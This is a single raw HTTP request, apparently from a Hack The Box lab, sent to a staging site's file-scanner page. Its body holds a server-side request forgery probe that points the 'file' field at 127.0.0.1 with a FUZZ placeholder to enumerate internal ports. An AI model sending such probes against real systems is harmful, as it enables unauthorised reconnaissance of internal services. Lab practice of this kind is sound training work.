POST /beta.php HTTP/1.1
Host: staging.love.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://staging.love.htb
Connection: close
Referer: http://staging.love.htb/beta.php
Upgrade-Insecure-Requests: 1

file=http://127.0.0.1:FUZZ&read=Scan+file
